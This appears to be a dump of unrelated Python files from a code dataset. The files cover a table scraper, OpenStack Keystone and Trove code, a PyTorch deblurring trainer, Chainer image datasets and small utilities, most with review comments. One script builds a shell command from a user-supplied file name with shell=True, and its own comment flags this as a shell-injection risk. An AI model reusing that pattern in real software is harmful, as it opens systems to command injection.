        use_json=False,
        raw_reply=True,
        allow_redirects=False,
    )
    return BrowserLoginResponse(reply, username_post_url)
|
#!/usr/bin/env python2
# -*- encoding: utf-8 -*-
"""Scrape every <table> from a URL (or a local HTML file) into outN.csv files."""
import csv
import sys

import urllib2
from BeautifulSoup import BeautifulSoup
from urllib2 import urlopen

try:
    f = urlopen(sys.argv[1])
except (urllib2.URLError, ValueError):
    # Argument is not a fetchable URL; treat it as a local file path.
    # BUG FIX: the original caught `urllib2.HTTPError` without ever importing
    # the `urllib2` module (only `urlopen` was imported), so evaluating the
    # except clause raised NameError; also, urlopen signals a non-URL
    # argument with ValueError, which was never caught.
    f = open(sys.argv[1])

soup = BeautifulSoup(f)
tables = soup.findAll('table')

# BUG FIX: `idx` was never incremented, so every table overwrote out0.csv;
# enumerate() now gives each table its own output file.
for idx, table in enumerate(tables):
    headers = [header.text for header in table.findAll('th')]
    rows = []
    for row in table.findAll('tr'):
        rows.append([val.text.encode('utf8') for val in row.findAll('td')])
    # Separate handle name so the input file object `f` is not clobbered.
    with open('out' + str(idx) + '.csv', 'wb') as out:
        writer = csv.writer(out)
        writer.writerow(headers)
        writer.writerows(r for r in rows if r)
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from keystone.contrib.extensions.admin.extension import BaseExtensionHandler
from keystone.controllers.endpointtemplates import EndpointTemplatesController
class ExtensionHandler(BaseExtensionHandler):
    """Registers the OS-KSCATALOG endpoint-template and tenant-endpoint routes."""

    def map_extension_methods(self, mapper):
        """Wire every OS-KSCATALOG route to the endpoint-templates controller."""
        controller = EndpointTemplatesController()
        # (path, controller action, HTTP method) — connected in this order.
        routes = [
            # EndpointTemplates calls
            ("/OS-KSCATALOG/endpointTemplates",
             "get_endpoint_templates", "GET"),
            ("/OS-KSCATALOG/endpointTemplates",
             "add_endpoint_template", "POST"),
            ("/OS-KSCATALOG/endpointTemplates/{endpoint_template_id}",
             "get_endpoint_template", "GET"),
            ("/OS-KSCATALOG/endpointTemplates/{endpoint_template_id}",
             "modify_endpoint_template", "PUT"),
            ("/OS-KSCATALOG/endpointTemplates/{endpoint_template_id}",
             "delete_endpoint_template", "DELETE"),
            # Endpoint calls
            ("/tenants/{tenant_id}/OS-KSCATALOG/endpoints",
             "get_endpoints_for_tenant", "GET"),
            ("/tenants/{tenant_id}/OS-KSCATALOG/endpoints",
             "add_endpoint_to_tenant", "POST"),
            ("/tenants/{tenant_id}/OS-KSCATALOG/endpoints/{endpoint_id}",
             "remove_endpoint_from_tenant", "DELETE"),
        ]
        for path, action, method in routes:
            mapper.connect(path,
                           controller=controller,
                           action=action,
                           conditions=dict(method=[method]))
|
import pandas as pd
import sys
import os
import re
import shutil
import subprocess

# Scratch file handed from pandas to the csvtomd/pandoc pipeline.
INTERMEDIATE = "csv-intermediate-file-csv"


def csvtomd(output):
    """Render the intermediate CSV to markdown *output*, then to users.html.

    NOTE(review): *output* is interpolated into a shell command line
    (shell=True), so this is only safe for trusted command-line arguments —
    a hostile value allows shell injection.

    Returns:
        The completed subprocess.Popen handle.
    """
    proc = subprocess.Popen(
        'csvtomd {inter} > {out}; rm {inter}; pandoc -o users.html {out}'.format(
            inter=INTERMEDIATE, out=output),
        stdout=subprocess.PIPE, shell=True)
    # BUG FIX: the pipeline was never waited on, so the script could exit
    # before csvtomd/pandoc finished writing their output files.
    proc.communicate()
    return proc


inputs = sys.argv[1]
output = sys.argv[2]

# Two-column CSV without a header row: username,hostname.
df = pd.read_csv(inputs, sep=",", header=None, names=["Username", "Hostname"])
df.to_csv(INTERMEDIATE, index=False)
csvtomd(output)
|
from mopidy_vfd import Extension
def test_get_default_config():
    """Default config must declare the [vfd] section and be enabled."""
    default_config = Extension().get_default_config()
    assert "[vfd]" in default_config
    assert "enabled = true" in default_config
def test_get_config_schema():
    """Config schema must expose the 'display' option."""
    config_schema = Extension().get_config_schema()
    assert "display" in config_schema
|
# Copyright [2015] Hewlett-Packard Development Company, L.P.
# Copyright 2016 Tesora Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from novaclient import exceptions as nova_exceptions
from oslo_log import log as logging
from trove.cluster import models as cluster_models
from trove.cluster.tasks import ClusterTasks
from trove.cluster.views import ClusterView
from trove.common import cfg
from trove.common import exception
from trove.common import remote
from trove.common import server_group as srv_grp
from trove.common.strategies.cluster import base as cluster_base
from trove.extensions.mgmt.clusters.views import MgmtClusterView
from trove.instance.models import DBInstance
from trove.instance.models import Instance
from trove.quota.quota import check_quotas
from trove.taskmanager import api as task_api
# Module-level logger and global trove configuration handle.
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class GaleraCommonAPIStrategy(cluster_base.BaseAPIStrategy):
    """API strategy wiring the Galera cluster model and view classes."""

    @property
    def cluster_class(self):
        """Model class handling Galera cluster operations."""
        return GaleraCommonCluster

    @property
    def cluster_view_class(self):
        """View class for user-facing cluster responses."""
        return GaleraCommonClusterView

    @property
    def mgmt_cluster_view_class(self):
        """View class for management (admin) cluster responses."""
        return GaleraCommonMgmtClusterView
class GaleraCommonCluster(cluster_models.Cluster):
    """Cluster model shared by Galera-replicated datastores.

    Provides create/grow/shrink plus rolling maintenance operations; every
    node in a Galera cluster carries the same 'member' instance type.
    """

    @staticmethod
    def _validate_cluster_instances(context, instances, datastore,
                                    datastore_version):
        """Validate the flavor and volume"""
        # Per-datastore configuration section for this manager.
        ds_conf = CONF.get(datastore_version.manager)
        num_instances = len(instances)
        # Check number of instances is at least min_cluster_member_count
        if num_instances < ds_conf.min_cluster_member_count:
            raise exception.ClusterNumInstancesNotLargeEnough(
                num_instances=ds_conf.min_cluster_member_count)
        # Checking volumes and get delta for quota check
        cluster_models.validate_instance_flavors(
            context, instances, ds_conf.volume_support, ds_conf.device_path)
        req_volume_size = cluster_models.get_required_volume_size(
            instances, ds_conf.volume_support)
        # All members must share the same flavor/volume specification.
        cluster_models.assert_homogeneous_cluster(instances)
        deltas = {'instances': num_instances, 'volumes': req_volume_size}
        # quota check
        check_quotas(context.tenant, deltas)
        # Checking networks are same for the cluster; only the first NIC of
        # each instance is compared.
        instance_nics = []
        for instance in instances:
            nics = instance.get('nics')
            if nics:
                instance_nics.append(nics[0].get('net-id'))
        if len(set(instance_nics)) > 1:
            raise exception.ClusterNetworksNotEqual()
        if not instance_nics:
            # No explicit networks requested; nothing further to verify.
            return
        instance_nic = instance_nics[0]
        try:
            nova_client = remote.create_nova_client(context)
            nova_client.networks.get(instance_nic)
        except nova_exceptions.NotFound:
            raise exception.NetworkNotFound(uuid=instance_nic)

    @staticmethod
    def _create_instances(context, db_info, datastore, datastore_version,
                          instances, extended_properties, locality,
                          configuration_id):
        """Create one trove Instance per requested member.

        Unnamed members are auto-named '<cluster>-member-<n>'.
        NOTE(review): extended_properties is accepted but unused here.
        """
        member_config = {"id": db_info.id,
                         "instance_type": "member"}
        name_index = 1
        for instance in instances:
            if not instance.get("name"):
                instance['name'] = "%s-member-%s" % (db_info.name,
                                                     str(name_index))
                name_index += 1
        return [Instance.create(context,
                                instance['name'],
                                instance['flavor_id'],
                                datastore_version.image_id,
                                [], [],
                                datastore, datastore_version,
                                instance.get('volume_size', None),
                                None,
                                availability_zone=instance.get(
                                    'availability_zone', None),
                                nics=instance.get('nics', None),
                                configuration_id=configuration_id,
                                cluster_config=member_config,
                                modules=instance.get('modules'),
                                locality=locality,
                                region_name=instance.get('region_name')
                                )
                for instance in instances]

    @classmethod
    def create(cls, context, name, datastore, datastore_version,
               instances, extended_properties, locality, configuration):
        """Validate the request, persist the DBCluster record, create the
        member instances and hand off cluster configuration to taskmanager.
        """
        LOG.debug("Initiating Galera cluster creation.")
        cls._validate_cluster_instances(context, instances, datastore,
                                        datastore_version)
        # Updating Cluster Task
        db_info = cluster_models.DBCluster.create(
            name=name, tenant_id=context.tenant,
            datastore_version_id=datastore_version.id,
            task_status=ClusterTasks.BUILDING_INITIAL,
            configuration_id=configuration)
        cls._create_instances(context, db_info, datastore, datastore_version,
                              instances, extended_properties, locality,
                              configuration)
        # Calling taskmanager to further proceed for cluster-configuration
        task_api.load(context, datastore_version.manager).create_cluster(
            db_info.id)
        return cls(context, db_info, datastore, datastore_version)

    def grow(self, instances):
        """Add new member instances to this cluster."""
        LOG.debug("Growing cluster %s." % self.id)
        self.validate_cluster_available()
        context = self.context
        db_info = self.db_info
        datastore = self.ds
        datastore_version = self.ds_version
        db_info.update(task_status=ClusterTasks.GROWING_CLUSTER)
        try:
            # New members inherit the cluster's locality hint and config group.
            locality = srv_grp.ServerGroup.convert_to_hint(self.server_group)
            configuration_id = self.db_info.configuration_id
            new_instances = self._create_instances(
                context, db_info, datastore, datastore_version, instances,
                None, locality, configuration_id)
            task_api.load(context, datastore_version.manager).grow_cluster(
                db_info.id, [instance.id for instance in new_instances])
        except Exception:
            # Reset the task so the cluster is not left stuck in GROWING.
            db_info.update(task_status=ClusterTasks.NONE)
            raise
        return self.__class__(context, db_info,
                              datastore, datastore_version)

    def shrink(self, instances):
        """Removes instances from a cluster."""
        LOG.debug("Shrinking cluster %s." % self.id)
        self.validate_cluster_available()
        removal_instances = [Instance.load(self.context, inst_id)
                             for inst_id in instances]
        db_instances = DBInstance.find_all(cluster_id=self.db_info.id).all()
        # At least one member must remain after the shrink.
        if len(db_instances) - len(removal_instances) < 1:
            raise exception.ClusterShrinkMustNotLeaveClusterEmpty()
        self.db_info.update(task_status=ClusterTasks.SHRINKING_CLUSTER)
        try:
            task_api.load(self.context, self.ds_version.manager
                          ).shrink_cluster(self.db_info.id,
                                           [instance.id
                                            for instance in removal_instances])
        except Exception:
            # Reset the task so the cluster is not left stuck in SHRINKING.
            self.db_info.update(task_status=ClusterTasks.NONE)
            raise
        return self.__class__(self.context, self.db_info,
                              self.ds, self.ds_version)

    def restart(self):
        """Rolling restart of all cluster members."""
        self.rolling_restart()

    def upgrade(self, datastore_version):
        """Rolling upgrade of all members to datastore_version."""
        self.rolling_upgrade(datastore_version)

    def configuration_attach(self, configuration_id):
        """Rolling attach of a configuration group to all members."""
        self.rolling_configuration_update(configuration_id)

    def configuration_detach(self):
        """Rolling detach of the configuration group from all members."""
        self.rolling_configuration_remove()
class GaleraCommonClusterView(ClusterView):
    """User-facing view of a Galera cluster."""

    def build_instances(self):
        """Build instance views; every Galera node has the 'member' type."""
        member_types = ['member']
        return self._build_instances(member_types, member_types)
class GaleraCommonMgmtClusterView(MgmtClusterView):
    """Management (admin) view of a Galera cluster."""

    def build_instances(self):
        """Build instance views; every Galera node has the 'member' type."""
        member_types = ['member']
        return self._build_instances(member_types, member_types)
|
import torch
import torchvision
import torch.nn as nn
import torch.optim as optim
from tqdm import tqdm
from torchvision.utils import save_image
from model import DeblurCNN, get_model
# Prefer the first CUDA GPU when available; all models/tensors are moved here.
device = 'cuda:0' if torch.cuda.is_available() else 'cpu'
def util(model):
    """Build the training objects for the deblurring model.

    Returns:
        (criterion, optimizer): MSE loss and an Adam optimizer (lr=0.001)
        over the model's conv1/conv2/conv3 parameter groups.
    """
    criterion = nn.MSELoss()
    param_groups = [
        {'params': model.conv1.parameters()},
        {'params': model.conv2.parameters()},
        {'params': model.conv3.parameters()},
    ]
    optimizer = optim.Adam(param_groups, lr=0.001)
    return criterion, optimizer
def fit(model, dataloader, train_data, epoch):
    """Run one training epoch of the deblurring model.

    Args:
        model: DeblurCNN-style model with conv1/conv2/conv3 layers.
        dataloader: yields (blur_image, sharp_image) batches.
        train_data: training dataset (used only for the progress-bar total).
        epoch: current epoch number (unused in the loop itself).

    Returns:
        Average training loss per sample.
    """
    criterion, optimizer = util(model)
    model.train()
    total_loss = 0.0
    n_batches = int(len(train_data) / dataloader.batch_size)
    for batch in tqdm(dataloader, total=n_batches):
        blur_image = batch[0].to(device)
        sharp_image = batch[1].to(device)
        optimizer.zero_grad()
        prediction = model(blur_image)
        batch_loss = criterion(prediction, sharp_image)
        # Backpropagate and update the parameters.
        batch_loss.backward()
        optimizer.step()
        total_loss += batch_loss.item()
    train_loss = total_loss / len(dataloader.dataset)
    print(f"Train Loss: {train_loss:.5f}")
    return train_loss
def save_decoded_image(img, name, channels=3, height=1024, width=1024):
    """Reshape a flat batch of decoded images and write them to *name*.

    The output resolution was previously hard-coded to 3x1024x1024; it is
    now parameterized with the same defaults, so existing callers behave
    identically.

    Args:
        img: tensor whose first dimension is the batch size.
        name: destination image path.
        channels, height, width: per-image shape used for the reshape.
    """
    img = img.view(img.size(0), channels, height, width)
    save_image(img, name)
def validate(model, dataloader, val_data, epoch):
    """Evaluate the deblurring model on the validation set.

    Args:
        model: DeblurCNN-style model with conv1/conv2/conv3 layers.
        dataloader: yields (blur_image, sharp_image) batches.
        val_data: validation dataset (used only for the progress-bar total).
        epoch: epoch number, used to name the saved sample image.

    Returns:
        Average validation loss per sample.
    """
    # Only the criterion is needed for evaluation; the optimizer returned by
    # util() was previously constructed here and never used.
    criterion, _ = util(model)
    model.eval()
    running_loss = 0.0
    outputs = None
    with torch.no_grad():
        for data in tqdm(enumerate(dataloader), total=int(len(val_data)/dataloader.batch_size)):
            blur_image = data[1][0].to(device)
            sharp_image = data[1][1].to(device)
            outputs = model(blur_image)
            loss = criterion(outputs, sharp_image)
            running_loss += loss.item()
    val_loss = running_loss / len(dataloader.dataset)
    print(f"Val Loss: {val_loss:.5f}")
    # Save the last batch of deblurred outputs for visual inspection.
    # BUG FIX: `outputs` was referenced after the loop unconditionally, which
    # raised NameError when the dataloader was empty.
    if outputs is not None:
        save_decoded_image(outputs.cpu().data, name=f"../outputs/saved_images/val_deblurred{epoch}.jpg")
    return val_loss
import cv2
class Camera(object):
    """Camera object for capturing pictures and video."""

    def __init__(self, camera, dimmensions):
        """Open capture device *camera* and configure the frame size.

        Args:
            camera: n'th camera to open (zero indexed).
            dimmensions: (width, height) of the image in pixels.
        """
        self.camera = cv2.VideoCapture(camera)
        width, height = dimmensions
        # Property ids 3 and 4 are CAP_PROP_FRAME_WIDTH / CAP_PROP_FRAME_HEIGHT.
        self.camera.set(3, width)
        self.camera.set(4, height)

    def get_img(self):
        """Grab a single frame from the camera.

        Returns:
            img: the captured image.

        Raises:
            Exception: 'CameraError' when no frame could be read.
        """
        ret, img = self.camera.read()
        if not ret:
            raise Exception('CameraError')
        return img
class Solution(object):
    def longestCommonPrefix(self, strs):
        """Return the longest common prefix shared by all strings in *strs*.

        :type strs: List[str]
        :rtype: str
        """
        if not strs:
            return ""
        prefix_len = 0
        # zip(*strs) walks the strings column by column, stopping at the
        # shortest string; extend the prefix while each column is uniform.
        for column in zip(*strs):
            if any(ch != column[0] for ch in column):
                break
            prefix_len += 1
        return strs[0][:prefix_len]
|
import os
import numpy as np
from PIL import Image
import chainer
from chainer.dataset import dataset_mixin
class Cifar10Dataset(dataset_mixin.DatasetMixin):
    """CIFAR-10 images (no labels) rescaled to the [-1.0, 1.0] range."""

    def __init__(self, test=False):
        train_split, test_split = chainer.datasets.get_cifar10(
            ndim=3, withlabel=False, scale=1.0)
        self.ims = test_split if test else train_split
        # Map pixel values from [0, 1] to [-1, 1].
        self.ims = self.ims * 2 - 1.0
        print("load cifar-10. shape: ", self.ims.shape)

    def __len__(self):
        return self.ims.shape[0]

    def get_example(self, i):
        """Return the i-th image array."""
        return self.ims[i]
def image_to_np(img, dtype=np.float32):
    """Convert a PIL image to a CHW float array scaled to [-1.0, 1.0].

    Args:
        img: PIL.Image instance.
        dtype: output array dtype. Now defaults to np.float32 — previously
            it was required, which broke preprocess_image's dtype-less call.

    Returns:
        np.ndarray of shape (3, H, W) with values in [-1.0, 1.0].
    """
    img = img.convert('RGB')
    img = np.asarray(img, dtype=np.uint8)
    img = img.transpose((2, 0, 1)).astype(dtype)
    # Grayscale safety net: replicate a single channel to three.
    # (Presumably unreachable after convert('RGB') — kept for safety.)
    if img.shape[0] == 1:
        img = np.broadcast_to(img, (3, img.shape[1], img.shape[2]))
    img = (img - 127.5) / 127.5
    return img
def preprocess_image(img, crop_width=256, img2np=True):
    """Resize so the short side is ~crop_width, then crop a crop_width square
    (horizontally centered, anchored at the top edge).

    Args:
        img: PIL.Image instance.
        crop_width: edge length of the square crop.
        img2np: when True, also convert the crop to a CHW float array.

    Returns:
        The cropped PIL image, or an np.ndarray when img2np is True.
    """
    short_side = min(img.size[0], img.size[1])
    # Small epsilon ensures the resized short side is >= crop_width.
    ratio = crop_width / short_side + 1e-4
    img = img.resize((int(ratio * img.size[0]), int(ratio * img.size[1])),
                     Image.BILINEAR)
    x_l = (img.size[0]) // 2 - crop_width // 2
    x_r = x_l + crop_width
    y_u = 0
    y_d = y_u + crop_width
    img = img.crop((x_l, y_u, x_r, y_d))
    if img2np:
        # BUG FIX: image_to_np required a dtype argument, so the original
        # dtype-less call raised TypeError at runtime.
        img = image_to_np(img, np.float32)
    return img
def find_all_files(directory):
    """Yield every directory and file path under *directory*, top-down.

    http://qiita.com/suin/items/cdef17e447ceeff6e79d
    """
    for dirpath, _dirnames, filenames in os.walk(directory):
        yield dirpath
        for filename in filenames:
            yield os.path.join(dirpath, filename)
class ImageDataset(dataset_mixin.DatasetMixin):
    """Image-folder dataset: either one class rooted at *root*, or one class
    per subdirectory of *root* (torchvision ImageFolder-style layout).
    """

    def __init__(self, root, one_class_flag=False, dtype=None, label_dtype=np.int32):
        # Recognized image file suffixes (matched case-insensitively).
        extensions = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif']
        if one_class_flag:
            # All files under root belong to a single class (label 0).
            classes = [os.path.basename(root)]
            class_to_idx = {}
            self.pairs = self._make_one_class_dataset(root, extensions)
        else:
            # One class per immediate subdirectory of root.
            classes, class_to_idx = self._find_classes(root)
            self.pairs = self._make_dataset(root, class_to_idx, extensions)
        if len(self.pairs) == 0:
            raise(RuntimeError("Found 0 files in subfolders of: " + root + "\n"
                               "Supported extensions are: " + ",".join(extensions)))
        self.root = root
        self.extensions = extensions
        self.classes = classes
        self.class_to_idx = class_to_idx
        # self._dtype = chainer.get_dtype(dtype)
        # The dtype parameter is currently ignored; arrays are always float32.
        self._dtype = np.float32
        self._label_dtype = label_dtype

    def __len__(self):
        return len(self.pairs)

    def get_example(self, i):
        """Load the i-th image as a CHW float array (label currently unused)."""
        path, int_label = self.pairs[i]
        img = Image.open(path)
        img = image_to_np(img, self._dtype)
        # label = np.array(int_label, dtype=self._label_dtype)
        return img#, label

    def _make_dataset(self, dir, class_to_idx, extensions):
        """Collect (path, class index) pairs from each class subdirectory."""
        images = []
        dir = os.path.expanduser(dir)
        for target in sorted(class_to_idx.keys()):
            d = os.path.join(dir, target)
            if not os.path.isdir(d):
                continue
            for root, _, fnames in sorted(os.walk(d)):
                for fname in sorted(fnames):
                    if self._has_file_allowed_extension(fname, extensions):
                        path = os.path.join(root, fname)
                        item = (path, class_to_idx[target])
                        images.append(item)
        return images

    def _make_one_class_dataset(self, dir, extensions):
        """Collect (path, 0) pairs for every image file under *dir*."""
        data_list = []
        dir = os.path.expanduser(dir)
        assert os.path.isdir(dir), '{} in make_dataset function is not directory'.format(dir)
        for root, _, fnames in sorted(os.walk(dir)):
            for fname in sorted(fnames):
                if self._has_file_allowed_extension(fname, extensions):
                    path = os.path.join(root, fname)
                    item = (path, 0)
                    data_list.append(item)
        return data_list

    def _has_file_allowed_extension(self, filename, extensions):
        """Checks if a file is an allowed extension.

        Args:
            filename (string): path to a file

        Returns:
            bool: True if the filename ends with a known image extension
        """
        filename_lower = filename.lower()
        return any(filename_lower.endswith(ext) for ext in extensions)

    def _find_classes(self, dir):
        """
        Finds the class folders in a dataset.

        Args:
            dir (string): Root directory path.

        Returns:
            tuple: (classes, class_to_idx) where classes are relative to (dir), and class_to_idx is a dictionary.

        Ensures:
            No class is a subdirectory of another.
        """
        classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]
        classes.sort()
        class_to_idx = {classes[i]: i for i in range(len(classes))}
        return classes, class_to_idx
class ImagenetDataset(dataset_mixin.DatasetMixin):
    """Dataset over a list of image file paths; each example is loaded and
    square-cropped via preprocess_image.
    """

    def __init__(self, file_list, crop_width=256):
        # crop_width: edge length of the square crop produced per example.
        self.crop_width = crop_width
        self.image_files = file_list
        print(len(self.image_files))

    def __len__(self):
        return len(self.image_files)

    def get_example(self, i):
        """Load and preprocess the i-th image.

        NOTE(review): if Image.open keeps failing for this path, the while
        loop retries the SAME file forever — a likely infinite loop on a
        corrupt or missing file; confirm intended behavior.
        """
        # Reseed numpy's RNG — presumably so dataloader worker processes do
        # not share RNG state; TODO confirm this is still needed.
        np.random.seed()
        img = None
        while img is None:
            # print(i,id)
            try:
                fn = "%s" % (self.image_files[i])
                img = Image.open(fn)
            except Exception as e:
                print(i, fn, str(e))
        return preprocess_image(img, crop_width=self.crop_width)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.